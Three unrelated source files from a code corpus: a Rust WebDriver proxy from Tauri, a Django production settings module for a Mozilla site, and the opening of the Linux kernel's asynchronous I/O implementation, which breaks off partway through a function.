/// driver by `forward_to_native_driver` and sent with `client`.
async fn handle(
    client: Client<HttpConnector, Full<Bytes>>,
    req: Request<Incoming>,
    args: Args,
) -> Result<Response<Incoming>, Error> {
    // manipulate a new session to convert options to the native driver format
    let new_req: Request<Full<Bytes>> =
        if let (&Method::POST, "/session") = (req.method(), req.uri().path()) {
            let (mut parts, body) = req.into_parts();
            // get the body from the future stream and parse it as json
            let body = body.collect().await?.to_bytes().to_vec();
            let json: Value = serde_json::from_slice(&body)?;
            // manipulate the json to convert from tauri option to native driver options
            let json = map_capabilities(json);
            // serialize json and update the content-length header to be accurate
            let bytes = serde_json::to_vec(&json)?;
            parts.headers.insert(CONTENT_LENGTH, bytes.len().into());
            Request::from_parts(parts, Full::new(bytes.into()))
        } else {
            // non-session requests: buffer the body and pass it through as-is
            let (parts, body) = req.into_parts();
            let body = body.collect().await?.to_bytes().to_vec();
            Request::from_parts(parts, Full::new(body.into()))
        };
    client
        .request(forward_to_native_driver(new_req, args)?)
        .err_into()
        .await
}
/// Transform the request to a request for the native webdriver server.
fn forward_to_native_driver(
mut req: Request<Full<Bytes>>,
args: Args,
) -> Result<Request<Full<Bytes>>, Error> {
let host: Authority = {
let headers = req.headers_mut();
headers.remove("host").expect("hyper request has host")
}
.to_str()?
.parse()?;
let path = req
.uri()
.path_and_query()
.expect("hyper request has uri")
.clone();
let uri = format!(
"http://{}:{}{}",
host.host(),
args.native_port,
path.as_str()
);
let (mut parts, body) = req.into_parts();
parts.uri = uri.parse()?;
Ok(Request::from_parts(parts, body))
}
/// only happy path for now, no errors
fn map_capabilities(mut json: Value) -> Value {
let mut native = None;
if let Some(capabilities) = json.get_mut("capabilities") {
if let Some(always_match) = capabilities.get_mut("alwaysMatch") {
if let Some(always_match) = always_match.as_object_mut() {
if let Some(tauri_options) = always_match.remove(TAURI_OPTIONS) {
if let Ok(options) = serde_json::from_value::<TauriOptions>(tauri_options) {
native = Some(options.into_native_object());
}
}
if let Some(native) = native.clone() {
always_match.extend(native);
}
}
}
}
if let Some(native) = native {
if let Some(desired) = json.get_mut("desiredCapabilities") {
if let Some(desired) = desired.as_object_mut() {
desired.remove(TAURI_OPTIONS);
desired.extend(native);
}
}
}
json
}
/// Entry point for the proxy server, on a single-threaded tokio runtime.
///
/// Listens on `127.0.0.1:args.port` and serves each accepted connection
/// with `handle`, which proxies to the native WebDriver server. On Unix,
/// SIGTERM/SIGINT/SIGQUIT kill the spawned native driver child process
/// before the process exits.
#[tokio::main(flavor = "current_thread")]
pub async fn run(args: Args, mut _driver: Child) -> Result<(), Error> {
    // On Unix, install a signal task that owns the native driver child and
    // kills it on termination signals.
    #[cfg(unix)]
    let (signals_handle, signals_task) = {
        use futures_util::StreamExt;
        use signal_hook::consts::signal::*;
        let signals = signal_hook_tokio::Signals::new([SIGTERM, SIGINT, SIGQUIT])?;
        let signals_handle = signals.handle();
        let signals_task = tokio::spawn(async move {
            let mut signals = signals.fuse();
            #[allow(clippy::never_loop)]
            while let Some(signal) = signals.next().await {
                match signal {
                    SIGTERM | SIGINT | SIGQUIT => {
                        _driver
                            .kill()
                            .expect("unable to kill native webdriver server");
                        std::process::exit(0);
                    }
                    _ => unreachable!(),
                }
            }
        });
        (signals_handle, signals_task)
    };
    let address = std::net::SocketAddr::from(([127, 0, 0, 1], args.port));
    // the client we use to proxy requests to the native webdriver
    let client = Client::builder(TokioExecutor::new())
        .http1_preserve_header_case(true)
        .http1_title_case_headers(true)
        .retry_canceled_requests(false)
        .build_http();
    // set up a http1 server that uses the service we just created
    let srv = async move {
        if let Ok(listener) = TcpListener::bind(address).await {
            // Accept loop: one spawned task per connection.
            loop {
                let client = client.clone();
                let args = args.clone();
                if let Ok((stream, _)) = listener.accept().await {
                    let io = TokioIo::new(stream);
                    tokio::task::spawn(async move {
                        if let Err(err) = auto::Builder::new(TokioExecutor::new())
                            .http1()
                            .title_case_headers(true)
                            .preserve_header_case(true)
                            .serve_connection(
                                io,
                                service_fn(|request| handle(client.clone(), request, args.clone())),
                            )
                            .await
                        {
                            println!("Error serving connection: {err:?}");
                        }
                    });
                } else {
                    println!("accept new stream fail, ignore here");
                }
            }
        } else {
            println!("can not listen to address: {address:?}");
        }
    };
    srv.await;
    // Only reached if the server future ever completes (e.g. bind failure).
    #[cfg(unix)]
    {
        signals_handle.close();
        signals_task.await?;
    }
    Ok(())
} | rust | github | https://github.com/tauri-apps/tauri | crates/tauri-driver/src/server.rs
# Deployment settings (prod/dev) layered on top of the base settings module.
import os
import socket
from django.utils.translation import ugettext_lazy as _
from .base import *  # noqa
# 'prod' or 'dev'; selects the host whitelist and CDN/language config below.
SERVER_ENV = os.getenv('DJANGO_SERVER_ENV')
SECRET_KEY = os.getenv('SECRET_KEY')
# Deployed environments never run with debugging enabled.
DEBUG = TEMPLATE_DEBUG = False
ALLOWED_HOSTS = [
    # the server's IP (for monitors)
    socket.gethostbyname(socket.gethostname()),
]
if SERVER_ENV == 'prod':
    ALLOWED_HOSTS.extend([
        'webwewant.mozilla.org',
        'glow.cdn.mozilla.net',
        'glow-origin.cdn.mozilla.net',
    ])
    # Static assets are served from the CDN in production.
    STATIC_URL = 'https://glow.cdn.mozilla.net/static/'
    # Production locale list ('xx' is the untranslated Pirate locale).
    LANGUAGES = (
        ('cs', _('Czech')),
        ('de', _('German')),
        ('en', _('English')),
        ('es', _('Spanish')),
        ('fr', _('French')),
        ('he', _('Hebrew')),
        ('hu', _('Hungarian')),
        ('id', _('Indonesian')),
        ('it', _('Italian')),
        ('ja', _('Japanese')),
        ('ko', _('Korean')),
        ('lt', _('Lithuanian')),
        ('nl', _('Dutch')),
        ('pl', _('Polish')),
        ('pt-br', _('Brazilian Portuguese')),
        ('ro', _('Romanian')),
        ('ru', _('Russian')),
        ('sk', _('Slovak')),
        ('sl', _('Slovenian')),
        ('sq', _('Albanian')),
        ('sr', _('Serbian')),
        ('zh-cn', _('Simplified Chinese')),
        ('zh-tw', _('Traditional Chinese')),
        ('xx', 'Pirate'),
    )
elif SERVER_ENV == 'dev':
    ALLOWED_HOSTS.append('webwewant.allizom.org')
# Both caches talk to the same local redis socket, on different DB numbers.
CACHES = {
    # DB 1 is for the site cache
    'default': {
        'BACKEND': 'redis_cache.cache.RedisCache',
        'LOCATION': 'unix:/var/run/redis/redis.sock:1',
        'OPTIONS': {
            'PARSER_CLASS': 'redis.connection.HiredisParser',
        }
    },
    # DB 0 is for the glow data
    'smithers': {
        'BACKEND': 'redis_cache.cache.RedisCache',
        'LOCATION': 'unix:/var/run/redis/redis.sock:0',
        'OPTIONS': {
            'PARSER_CLASS': 'redis.connection.HiredisParser',
        }
    }
}
# Surface redis failures instead of silently ignoring them.
DJANGO_REDIS_IGNORE_EXCEPTIONS = False
ENABLE_REDIS = True
# Sentry
INSTALLED_APPS += ('raven.contrib.django.raven_compat',)
RAVEN_CONFIG = {
    'dsn': os.getenv('SENTRY_DSN'),
} | unknown | codeparrot/codeparrot-clean ||
/*
* An async IO implementation for Linux
* Written by Benjamin LaHaise <bcrl@kvack.org>
*
* Implements an efficient asynchronous io interface.
*
* Copyright 2000, 2001, 2002 Red Hat, Inc. All Rights Reserved.
* Copyright 2018 Christoph Hellwig.
*
* See ../COPYING for licensing terms.
*/
#define pr_fmt(fmt) "%s: " fmt, __func__
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/errno.h>
#include <linux/time.h>
#include <linux/aio_abi.h>
#include <linux/export.h>
#include <linux/syscalls.h>
#include <linux/backing-dev.h>
#include <linux/refcount.h>
#include <linux/uio.h>
#include <linux/sched/signal.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/mm.h>
#include <linux/mman.h>
#include <linux/percpu.h>
#include <linux/slab.h>
#include <linux/timer.h>
#include <linux/aio.h>
#include <linux/highmem.h>
#include <linux/workqueue.h>
#include <linux/security.h>
#include <linux/eventfd.h>
#include <linux/blkdev.h>
#include <linux/compat.h>
#include <linux/migrate.h>
#include <linux/ramfs.h>
#include <linux/percpu-refcount.h>
#include <linux/mount.h>
#include <linux/pseudo_fs.h>
#include <linux/uaccess.h>
#include <linux/nospec.h>
#include "internal.h"
#define KIOCB_KEY		0

/*
 * Values stored in the user-visible aio_ring header (written by
 * aio_setup_ring() below).
 */
#define AIO_RING_MAGIC			0xa10a10a1
#define AIO_RING_COMPAT_FEATURES	1
#define AIO_RING_INCOMPAT_FEATURES	0

/* Header of the mmap'ed completion ring shared with userspace. */
struct aio_ring {
	unsigned	id;	/* kernel internal index number */
	unsigned	nr;	/* number of io_events */
	unsigned	head;	/* Written to by userland or under ring_lock
				 * mutex by aio_read_events_ring(). */
	unsigned	tail;
	unsigned	magic;
	unsigned	compat_features;
	unsigned	incompat_features;
	unsigned	header_length;	/* size of aio_ring */
	struct io_event	io_events[];
}; /* 128 bytes + ring size */

/*
 * Plugging is meant to work with larger batches of IOs. If we don't
 * have more than the below, then don't bother setting up a plug.
 */
#define AIO_PLUG_THRESHOLD	2

/* Ring folio pointers are kept inline in struct kioctx up to this count;
 * larger rings kmalloc a separate array (see aio_setup_ring()). */
#define AIO_RING_PAGES	8
/*
 * RCU-managed, resizable table mapping ring ids to contexts; grown and
 * installed by ioctx_add_table() below.
 */
struct kioctx_table {
	struct rcu_head		rcu;
	unsigned		nr;
	struct kioctx __rcu	*table[] __counted_by(nr);
};

/* Per-cpu batch of ringbuffer slots (see kioctx->reqs_available). */
struct kioctx_cpu {
	unsigned		reqs_available;
};

/* Completion/count pair used to wait for in-flight requests to drain
 * (signalled from free_ioctx_reqs()). */
struct ctx_rq_wait {
	struct completion comp;
	atomic_t count;
};
/*
 * Kernel-side state for one io_setup() context.
 *
 * Lifetime: ->users counts external references to the ctx; when it drops
 * to zero, free_ioctx_users() cancels outstanding requests and kills
 * ->reqs, which counts in-flight requests and, on reaching zero,
 * schedules free_ioctx() via ->free_rwork.
 */
struct kioctx {
	struct percpu_ref	users;
	atomic_t		dead;	/* nonzero once the ctx has been killed */

	struct percpu_ref	reqs;

	unsigned long		user_id;	/* == mmap_base; kept in sync on mremap */

	struct kioctx_cpu __percpu *cpu;

	/*
	 * For percpu reqs_available, number of slots we move to/from global
	 * counter at a time:
	 */
	unsigned		req_batch;
	/*
	 * This is what userspace passed to io_setup(), it's not used for
	 * anything but counting against the global max_reqs quota.
	 *
	 * The real limit is nr_events - 1, which will be larger (see
	 * aio_setup_ring())
	 */
	unsigned		max_reqs;

	/* Size of ringbuffer, in units of struct io_event */
	unsigned		nr_events;

	unsigned long		mmap_base;	/* userspace address of the ring mapping */
	unsigned long		mmap_size;

	struct folio		**ring_folios;	/* backing folios of the ring */
	long			nr_pages;

	struct rcu_work		free_rwork;	/* see free_ioctx() */

	/*
	 * signals when all in-flight requests are done
	 */
	struct ctx_rq_wait	*rq_wait;

	struct {
		/*
		 * This counts the number of available slots in the ringbuffer,
		 * so we avoid overflowing it: it's decremented (if positive)
		 * when allocating a kiocb and incremented when the resulting
		 * io_event is pulled off the ringbuffer.
		 *
		 * We batch accesses to it with a percpu version.
		 */
		atomic_t	reqs_available;
	} ____cacheline_aligned_in_smp;

	struct {
		spinlock_t	ctx_lock;
		struct list_head active_reqs;	/* used for cancellation */
	} ____cacheline_aligned_in_smp;

	struct {
		struct mutex	ring_lock;
		wait_queue_head_t wait;
	} ____cacheline_aligned_in_smp;

	struct {
		unsigned	tail;
		unsigned	completed_events;
		spinlock_t	completion_lock;
	} ____cacheline_aligned_in_smp;

	/* inline folio array used when nr_pages <= AIO_RING_PAGES */
	struct folio		*internal_folios[AIO_RING_PAGES];
	struct file		*aio_ring_file;	/* anon file backing the ring mapping */

	unsigned		id;	/* slot index in mm->ioctx_table */
};
/*
 * First field must be the file pointer in all the
 * iocb unions! See also 'struct kiocb' in <linux/fs.h>
 */
struct fsync_iocb {
	struct file		*file;
	struct work_struct	work;	/* deferred execution (worker fn not in this chunk) */
	bool			datasync;	/* presumably fdatasync vs fsync -- set by submission path */
	struct cred		*creds;
};

struct poll_iocb {
	struct file		*file;
	struct wait_queue_head	*head;
	__poll_t		events;
	bool			cancelled;
	/* The three flags below coordinate the waitqueue callback with the
	 * work item; their exact protocol lives in code outside this chunk. */
	bool			work_scheduled;
	bool			work_need_resched;
	struct wait_queue_entry	wait;
	struct work_struct	work;
};
/*
 * NOTE! Each of the iocb union members has the file pointer
 * as the first entry in their struct definition. So you can
 * access the file pointer through any of the sub-structs,
 * or directly as just 'ki_filp' in this struct.
 */
struct aio_kiocb {
	union {
		struct file		*ki_filp;
		struct kiocb		rw;
		struct fsync_iocb	fsync;
		struct poll_iocb	poll;
	};

	struct kioctx		*ki_ctx;
	kiocb_cancel_fn		*ki_cancel;	/* set via kiocb_set_cancel_fn() */

	struct io_event		ki_res;	/* completion event reported to userspace */

	struct list_head	ki_list;	/* the aio core uses this
						 * for cancellation */
	refcount_t		ki_refcnt;

	/*
	 * If the aio_resfd field of the userspace iocb is not zero,
	 * this is the underlying eventfd context to deliver events to.
	 */
	struct eventfd_ctx	*ki_eventfd;
};
/*------ sysctl variables----*/
static DEFINE_SPINLOCK(aio_nr_lock);
static unsigned long aio_nr;		/* current system wide number of aio requests */
static unsigned long aio_max_nr = 0x10000; /* system wide maximum number of aio requests */
/*----end sysctl variables---*/

#ifdef CONFIG_SYSCTL
/* /proc/sys/fs/aio-nr (read-only) and /proc/sys/fs/aio-max-nr (writable). */
static const struct ctl_table aio_sysctls[] = {
	{
		.procname	= "aio-nr",
		.data		= &aio_nr,
		.maxlen		= sizeof(aio_nr),
		.mode		= 0444,
		.proc_handler	= proc_doulongvec_minmax,
	},
	{
		.procname	= "aio-max-nr",
		.data		= &aio_max_nr,
		.maxlen		= sizeof(aio_max_nr),
		.mode		= 0644,
		.proc_handler	= proc_doulongvec_minmax,
	},
};

static void __init aio_sysctl_init(void)
{
	register_sysctl_init("fs", aio_sysctls);
}
#else
#define aio_sysctl_init() do { } while (0)
#endif

/* Slab caches for request and context objects, created in aio_setup(). */
static struct kmem_cache	*kiocb_cachep;
static struct kmem_cache	*kioctx_cachep;

/* Internal mount backing the anonymous aio ring files. */
static struct vfsmount *aio_mnt;

static const struct file_operations aio_ring_fops;
static const struct address_space_operations aio_ctx_aops;
/*
 * Create the anonymous file that backs a context's completion ring.
 * The inode's private data points back at the kioctx so page migration
 * can find it (see aio_migrate_folio()). On failure the inode is dropped
 * and the error from alloc_file_pseudo() is returned.
 */
static struct file *aio_private_file(struct kioctx *ctx, loff_t nr_pages)
{
	struct file *file;
	struct inode *inode = alloc_anon_inode(aio_mnt->mnt_sb);
	if (IS_ERR(inode))
		return ERR_CAST(inode);

	inode->i_mapping->a_ops = &aio_ctx_aops;
	inode->i_mapping->i_private_data = ctx;
	inode->i_size = PAGE_SIZE * nr_pages;

	file = alloc_file_pseudo(inode, aio_mnt, "[aio]",
				O_RDWR, &aio_ring_fops);
	if (IS_ERR(file))
		iput(inode);	/* alloc_file_pseudo() failed to take over the inode */
	return file;
}
/* Initialize the pseudo filesystem context for the internal "aio" mount. */
static int aio_init_fs_context(struct fs_context *fc)
{
	if (!init_pseudo(fc, AIO_RING_MAGIC))
		return -ENOMEM;
	fc->s_iflags |= SB_I_NOEXEC;	/* nothing on this fs may be executed */
	return 0;
}
/* aio_setup
 *	Creates the slab caches used by the aio routines, panic on
 *	failure as this is done early during the boot sequence.
 */
static int __init aio_setup(void)
{
	static struct file_system_type aio_fs = {
		.name		= "aio",
		.init_fs_context = aio_init_fs_context,
		.kill_sb	= kill_anon_super,
	};
	/* Kernel-internal mount; its files back the mmap'ed rings. */
	aio_mnt = kern_mount(&aio_fs);
	if (IS_ERR(aio_mnt))
		panic("Failed to create aio fs mount.");

	kiocb_cachep = KMEM_CACHE(aio_kiocb, SLAB_HWCACHE_ALIGN|SLAB_PANIC);
	kioctx_cachep = KMEM_CACHE(kioctx,SLAB_HWCACHE_ALIGN|SLAB_PANIC);
	aio_sysctl_init();
	return 0;
}
__initcall(aio_setup);
/*
 * Disconnect and drop the ring's backing file. Clearing
 * i_mapping->i_private_data under i_private_lock stops
 * aio_migrate_folio() from reaching a kioctx that is going away.
 */
static void put_aio_ring_file(struct kioctx *ctx)
{
	struct file *aio_ring_file = ctx->aio_ring_file;
	struct address_space *i_mapping;

	if (aio_ring_file) {
		truncate_setsize(file_inode(aio_ring_file), 0);

		/* Prevent further access to the kioctx from migratepages */
		i_mapping = aio_ring_file->f_mapping;
		spin_lock(&i_mapping->i_private_lock);
		i_mapping->i_private_data = NULL;
		ctx->aio_ring_file = NULL;
		spin_unlock(&i_mapping->i_private_lock);

		fput(aio_ring_file);
	}
}
/*
 * Release the ring folios and, if one was kmalloc'ed (nr_pages >
 * AIO_RING_PAGES), the folio pointer array itself.
 */
static void aio_free_ring(struct kioctx *ctx)
{
	int i;

	/* Disconnect the kiotx from the ring file.  This prevents future
	 * accesses to the kioctx from page migration.
	 */
	put_aio_ring_file(ctx);

	for (i = 0; i < ctx->nr_pages; i++) {
		struct folio *folio = ctx->ring_folios[i];

		if (!folio)
			continue;

		pr_debug("pid(%d) [%d] folio->count=%d\n", current->pid, i,
			 folio_ref_count(folio));
		ctx->ring_folios[i] = NULL;
		folio_put(folio);
	}

	/* Only free a separately-allocated array, never the inline one. */
	if (ctx->ring_folios && ctx->ring_folios != ctx->internal_folios) {
		kfree(ctx->ring_folios);
		ctx->ring_folios = NULL;
	}
}
/*
 * mremap() callback for the ring mapping: find the kioctx that owns this
 * file in mm->ioctx_table and update its user_id/mmap_base to the VMA's
 * new start address. Fails with -EINVAL if the ctx is dead or not found.
 */
static int aio_ring_mremap(struct vm_area_struct *vma)
{
	struct file *file = vma->vm_file;
	struct mm_struct *mm = vma->vm_mm;
	struct kioctx_table *table;
	int i, res = -EINVAL;

	spin_lock(&mm->ioctx_lock);
	rcu_read_lock();
	table = rcu_dereference(mm->ioctx_table);
	if (!table)
		goto out_unlock;

	for (i = 0; i < table->nr; i++) {
		struct kioctx *ctx;

		ctx = rcu_dereference(table->table[i]);
		if (ctx && ctx->aio_ring_file == file) {
			if (!atomic_read(&ctx->dead)) {
				ctx->user_id = ctx->mmap_base = vma->vm_start;
				res = 0;
			}
			break;
		}
	}

out_unlock:
	rcu_read_unlock();
	spin_unlock(&mm->ioctx_lock);
	return res;
}
static const struct vm_operations_struct aio_ring_vm_ops = {
	.mremap		= aio_ring_mremap,
#if IS_ENABLED(CONFIG_MMU)
	.fault		= filemap_fault,
	.map_pages	= filemap_map_pages,
	.page_mkwrite	= filemap_page_mkwrite,
#endif
};

/* The ring mapping may be moved (mremap) but never grown. */
static int aio_ring_mmap_prepare(struct vm_area_desc *desc)
{
	desc->vm_flags |= VM_DONTEXPAND;
	desc->vm_ops = &aio_ring_vm_ops;
	return 0;
}

static const struct file_operations aio_ring_fops = {
	.mmap_prepare = aio_ring_mmap_prepare,
};
#if IS_ENABLED(CONFIG_MIGRATION)
/*
 * Migrate one ring folio from @src to @dst. Returns -EAGAIN when the
 * required locks can't be taken or the folio changed underneath us
 * (migration will retry), -EINVAL when the kioctx is gone or the index
 * is out of range.
 */
static int aio_migrate_folio(struct address_space *mapping, struct folio *dst,
			struct folio *src, enum migrate_mode mode)
{
	struct kioctx *ctx;
	unsigned long flags;
	pgoff_t idx;
	int rc = 0;

	/* mapping->i_private_lock here protects against the kioctx teardown. */
	spin_lock(&mapping->i_private_lock);
	ctx = mapping->i_private_data;
	if (!ctx) {
		rc = -EINVAL;
		goto out;
	}

	/* The ring_lock mutex.  The prevents aio_read_events() from writing
	 * to the ring's head, and prevents page migration from mucking in
	 * a partially initialized kiotx.
	 */
	if (!mutex_trylock(&ctx->ring_lock)) {
		rc = -EAGAIN;
		goto out;
	}

	idx = src->index;
	if (idx < (pgoff_t)ctx->nr_pages) {
		/* Make sure the old folio hasn't already been changed */
		if (ctx->ring_folios[idx] != src)
			rc = -EAGAIN;
	} else
		rc = -EINVAL;

	if (rc != 0)
		goto out_unlock;

	/* Writeback must be complete */
	BUG_ON(folio_test_writeback(src));
	folio_get(dst);

	rc = folio_migrate_mapping(mapping, dst, src, 1);
	if (rc) {
		/* mapping switch failed; drop our extra ref on dst */
		folio_put(dst);
		goto out_unlock;
	}

	/* Take completion_lock to prevent other writes to the ring buffer
	 * while the old folio is copied to the new.  This prevents new
	 * events from being lost.
	 */
	spin_lock_irqsave(&ctx->completion_lock, flags);
	folio_copy(dst, src);
	folio_migrate_flags(dst, src);
	BUG_ON(ctx->ring_folios[idx] != src);
	ctx->ring_folios[idx] = dst;
	spin_unlock_irqrestore(&ctx->completion_lock, flags);

	/* The old folio is no longer accessible. */
	folio_put(src);

out_unlock:
	mutex_unlock(&ctx->ring_lock);
out:
	spin_unlock(&mapping->i_private_lock);
	return rc;
}
#else
#define aio_migrate_folio NULL
#endif

static const struct address_space_operations aio_ctx_aops = {
	.dirty_folio	= noop_dirty_folio,
	.migrate_folio	= aio_migrate_folio,
};
/*
 * Allocate and map the completion ring for @ctx.
 *
 * Creates the anonymous backing file, populates its folios, mmaps the
 * whole thing into the current process, and initializes the user-visible
 * aio_ring header. On any failure everything allocated so far is torn
 * down and an errno is returned.
 */
static int aio_setup_ring(struct kioctx *ctx, unsigned int nr_events)
{
	struct aio_ring *ring;
	struct mm_struct *mm = current->mm;
	unsigned long size, unused;
	int nr_pages;
	int i;
	struct file *file;

	/* Compensate for the ring buffer's head/tail overlap entry */
	nr_events += 2;	/* 1 is required, 2 for good luck */

	size = sizeof(struct aio_ring);
	size += sizeof(struct io_event) * nr_events;

	nr_pages = PFN_UP(size);
	if (nr_pages < 0)
		return -EINVAL;

	file = aio_private_file(ctx, nr_pages);
	if (IS_ERR(file)) {
		ctx->aio_ring_file = NULL;
		return -ENOMEM;
	}

	ctx->aio_ring_file = file;
	/* Recompute capacity from the page-rounded allocation. */
	nr_events = (PAGE_SIZE * nr_pages - sizeof(struct aio_ring))
			/ sizeof(struct io_event);

	ctx->ring_folios = ctx->internal_folios;
	if (nr_pages > AIO_RING_PAGES) {
		ctx->ring_folios = kcalloc(nr_pages, sizeof(struct folio *),
					   GFP_KERNEL);
		if (!ctx->ring_folios) {
			put_aio_ring_file(ctx);
			return -ENOMEM;
		}
	}

	/* Fault in (and pin a ref on) each folio of the backing file. */
	for (i = 0; i < nr_pages; i++) {
		struct folio *folio;

		folio = __filemap_get_folio(file->f_mapping, i,
					    FGP_LOCK | FGP_ACCESSED | FGP_CREAT,
					    GFP_USER | __GFP_ZERO);
		if (IS_ERR(folio))
			break;

		pr_debug("pid(%d) [%d] folio->count=%d\n", current->pid, i,
			 folio_ref_count(folio));
		folio_end_read(folio, true);

		ctx->ring_folios[i] = folio;
	}
	ctx->nr_pages = i;

	if (unlikely(i != nr_pages)) {
		aio_free_ring(ctx);
		return -ENOMEM;
	}

	ctx->mmap_size = nr_pages * PAGE_SIZE;
	pr_debug("attempting mmap of %lu bytes\n", ctx->mmap_size);

	if (mmap_write_lock_killable(mm)) {
		ctx->mmap_size = 0;
		aio_free_ring(ctx);
		return -EINTR;
	}

	ctx->mmap_base = do_mmap(ctx->aio_ring_file, 0, ctx->mmap_size,
				 PROT_READ | PROT_WRITE,
				 MAP_SHARED, 0, 0, &unused, NULL);
	mmap_write_unlock(mm);
	if (IS_ERR((void *)ctx->mmap_base)) {
		ctx->mmap_size = 0;
		aio_free_ring(ctx);
		return -ENOMEM;
	}

	pr_debug("mmap address: 0x%08lx\n", ctx->mmap_base);

	ctx->user_id = ctx->mmap_base;
	ctx->nr_events = nr_events; /* trusted copy */

	/* Fill in the user-visible header on the first folio. */
	ring = folio_address(ctx->ring_folios[0]);
	ring->nr = nr_events;	/* user copy */
	ring->id = ~0U;	/* real id is assigned in ioctx_add_table() */
	ring->head = ring->tail = 0;
	ring->magic = AIO_RING_MAGIC;
	ring->compat_features = AIO_RING_COMPAT_FEATURES;
	ring->incompat_features = AIO_RING_INCOMPAT_FEATURES;
	ring->header_length = sizeof(struct aio_ring);
	flush_dcache_folio(ctx->ring_folios[0]);

	return 0;
}

/* How many io_events fit on a full page / on the first (header) page. */
#define AIO_EVENTS_PER_PAGE	(PAGE_SIZE / sizeof(struct io_event))
#define AIO_EVENTS_FIRST_PAGE	((PAGE_SIZE - sizeof(struct aio_ring)) / sizeof(struct io_event))
#define AIO_EVENTS_OFFSET	(AIO_EVENTS_PER_PAGE - AIO_EVENTS_FIRST_PAGE)
/*
 * Register a cancellation callback for an aio read/write kiocb and put
 * the request on its context's active_reqs list so free_ioctx_users()
 * can cancel it during teardown.
 */
void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
{
	struct aio_kiocb *req;
	struct kioctx *ctx;
	unsigned long flags;

	/*
	 * kiocb didn't come from aio or is neither a read nor a write, hence
	 * ignore it.
	 */
	if (!(iocb->ki_flags & IOCB_AIO_RW))
		return;

	req = container_of(iocb, struct aio_kiocb, rw);

	if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
		return;

	ctx = req->ki_ctx;

	spin_lock_irqsave(&ctx->ctx_lock, flags);
	list_add_tail(&req->ki_list, &ctx->active_reqs);
	req->ki_cancel = cancel;
	spin_unlock_irqrestore(&ctx->ctx_lock, flags);
}
EXPORT_SYMBOL(kiocb_set_cancel_fn);
/*
 * free_ioctx() should be RCU delayed to synchronize against the RCU
 * protected lookup_ioctx() and also needs process context to call
 * aio_free_ring().  Use rcu_work.
 */
static void free_ioctx(struct work_struct *work)
{
	struct kioctx *ctx = container_of(to_rcu_work(work), struct kioctx,
					  free_rwork);
	pr_debug("freeing %p\n", ctx);

	/* Final teardown: ring, percpu counters, refs, then the ctx itself. */
	aio_free_ring(ctx);
	free_percpu(ctx->cpu);
	percpu_ref_exit(&ctx->reqs);
	percpu_ref_exit(&ctx->users);
	kmem_cache_free(kioctx_cachep, ctx);
}
/*
 * ->reqs release callback: runs once the last in-flight request is done.
 * Wakes anyone waiting on rq_wait and schedules the RCU-delayed final
 * free via free_ioctx().
 */
static void free_ioctx_reqs(struct percpu_ref *ref)
{
	struct kioctx *ctx = container_of(ref, struct kioctx, reqs);

	/* At this point we know that there are no any in-flight requests */
	if (ctx->rq_wait && atomic_dec_and_test(&ctx->rq_wait->count))
		complete(&ctx->rq_wait->comp);

	/* Synchronize against RCU protected table->table[] dereferences */
	INIT_RCU_WORK(&ctx->free_rwork, free_ioctx);
	queue_rcu_work(system_percpu_wq, &ctx->free_rwork);
}
/*
 * When this function runs, the kioctx has been removed from the "hash table"
 * and ctx->users has dropped to 0, so we know no more kiocbs can be submitted -
 * now it's safe to cancel any that need to be.
 */
static void free_ioctx_users(struct percpu_ref *ref)
{
	struct kioctx *ctx = container_of(ref, struct kioctx, users);
	struct aio_kiocb *req;

	/* Cancel every request still on the active list. */
	spin_lock_irq(&ctx->ctx_lock);

	while (!list_empty(&ctx->active_reqs)) {
		req = list_first_entry(&ctx->active_reqs,
				       struct aio_kiocb, ki_list);
		req->ki_cancel(&req->rw);
		list_del_init(&req->ki_list);
	}

	spin_unlock_irq(&ctx->ctx_lock);

	/* Drop the initial ->reqs ref; free_ioctx_reqs() runs when it hits 0. */
	percpu_ref_kill(&ctx->reqs);
	percpu_ref_put(&ctx->reqs);
}
/*
 * Publish a freshly set-up kioctx in mm->ioctx_table, growing the table
 * when no free slot exists.  On success the ctx's slot index is stored in
 * ctx->id and mirrored into the user-visible ring header.  Returns 0 or
 * -ENOMEM if the table could not be grown.
 */
static int ioctx_add_table(struct kioctx *ctx, struct mm_struct *mm)
{
	unsigned i, new_nr;
	struct kioctx_table *table, *old;
	struct aio_ring *ring;

	spin_lock(&mm->ioctx_lock);
	table = rcu_dereference_raw(mm->ioctx_table);

	/* Loop: try to claim a free slot; if none, drop the lock, allocate
	 * a bigger table, retake the lock and retry (another thread may
	 * have installed a table meanwhile). */
	while (1) {
		if (table)
			for (i = 0; i < table->nr; i++)
				if (!rcu_access_pointer(table->table[i])) {
					ctx->id = i;
					rcu_assign_pointer(table->table[i], ctx);
					spin_unlock(&mm->ioctx_lock);

					/* While kioctx setup is in progress,
					 * we are protected from page migration
					 * changes ring_folios by ->ring_lock.
					 */
					ring = folio_address(ctx->ring_folios[0]);
					ring->id = ctx->id;
					return 0;
				}

		/* No free slot: quadruple the table size (start at 4). */
		new_nr = (table ? table->nr : 1) * 4;
		spin_unlock(&mm->ioctx_lock);

		table = kzalloc(struct_size(table, table, new_nr), GFP_KERNEL);
		if (!table)
			return -ENOMEM;

		table->nr = new_nr;

		spin_lock(&mm->ioctx_lock);
		old = rcu_dereference_raw(mm->ioctx_table);

		if (!old) {
			/* First table for this mm. */
			rcu_assign_pointer(mm->ioctx_table, table);
		} else if (table->nr > old->nr) {
			/* Our table is bigger: copy entries over, publish it,
			 * and RCU-free the old one (readers may hold it). */
			memcpy(table->table, old->table,
			       old->nr * sizeof(struct kioctx *));
			rcu_assign_pointer(mm->ioctx_table, table);
			kfree_rcu(old, rcu);
		} else {
			/* Someone else grew the table first; use theirs. */
			kfree(table);
			table = old;
		}
	}
}
/*
 * Return @nr request slots to the system-wide aio_nr budget.
 * An underflow (subtracting more than was accounted) indicates a bug:
 * warn and clamp the counter to zero instead of wrapping.
 */
static void aio_nr_sub(unsigned nr)
{
	spin_lock(&aio_nr_lock);
	if (!WARN_ON(aio_nr - nr > aio_nr))
		aio_nr -= nr;
	else
		aio_nr = 0;
	spin_unlock(&aio_nr_lock);
}
/* ioctx_alloc
 *	Allocates and initializes an ioctx.  Returns an ERR_PTR if it failed.
 */
static struct kioctx *ioctx_alloc(unsigned nr_events)
{
	struct mm_struct *mm = current->mm;
	struct kioctx *ctx;
	int err = -ENOMEM;

	/*
	 * Store the original nr_events -- what userspace passed to io_setup(),
